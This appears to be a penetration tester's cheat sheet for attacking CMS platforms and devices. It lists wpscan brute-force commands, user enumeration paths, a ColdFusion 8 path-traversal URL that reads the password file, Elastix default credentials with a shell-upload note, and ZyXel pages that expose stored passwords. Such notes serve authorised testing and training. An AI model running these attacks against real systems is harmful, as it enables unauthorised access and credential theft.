CMS

• Enumerate version and few other details

  • If don't found the version, download the source code and grep the version. We might found the page that contains the version then.

• Google their vulnerability

• Default password login page

• Guessing password login page?

Wordpress

Wpscan

wpscan --url $ip/wp/

Bruteforce login page

wpscan --url <ip> --username <nama> --wordlist <path to list>

Random agent

wpscan --url http://cybear32c.lab/ --random-agent

Zoom.py - enumerate wordpress users

python zoom.py -u <wordpress site>

admin page

/wp-admin
/wp-login

Configuration files

setup-config.php
wp-config.php

Enumerate users

/?author=1, /?author=2,

Drupal

Droopescan

droopescan scan drupal -u http://example.org/ -t 32

Find version

/CHANGELOG.txt

Adobe Cold Fusion

Determine version

/CFIDE/adminapi/base.cfc?wsdl

Version 8 Vulnerability

• fckeditor

• LFI

  http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Elastix

• Google the vulnerabitlities

• default login are admin:admin at /vtigercrm/

• able to upload shell in profile-photo

Joomla

• Admin page - /administrator

• Configuration files

  configuration.php
  diagnostics.php
  joomla.inc.php
  config.inc.php

Mambo

Config files

configuration.php
config.inc.php  

ZyXel

Configuration files

/WAN.html (contains PPPoE ISP password) 
/WLAN_General.html and /WLAN.html (contains WEP key) 
/rpDyDNS.html (contains DDNS credentials) 
/Firewall_DefPolicy.html (Firewall) 
/CF_Keyword.html (Content Filter) 
/RemMagWWW.html (Remote MGMT) 
/rpSysAdmin.html (System) 
/LAN_IP.html (LAN) 
/NAT_General.html (NAT) 
/ViewLog.html (Logs) 
/rpFWUpload.html (Tools) 
/DiagGeneral.html (Diagnostic) 
/RemMagSNMP.html (SNMP Passwords) 
/LAN_ClientList.html (Current DHCP Leases) 

# Config Backups
/RestoreCfg.html
/BackupCfg.html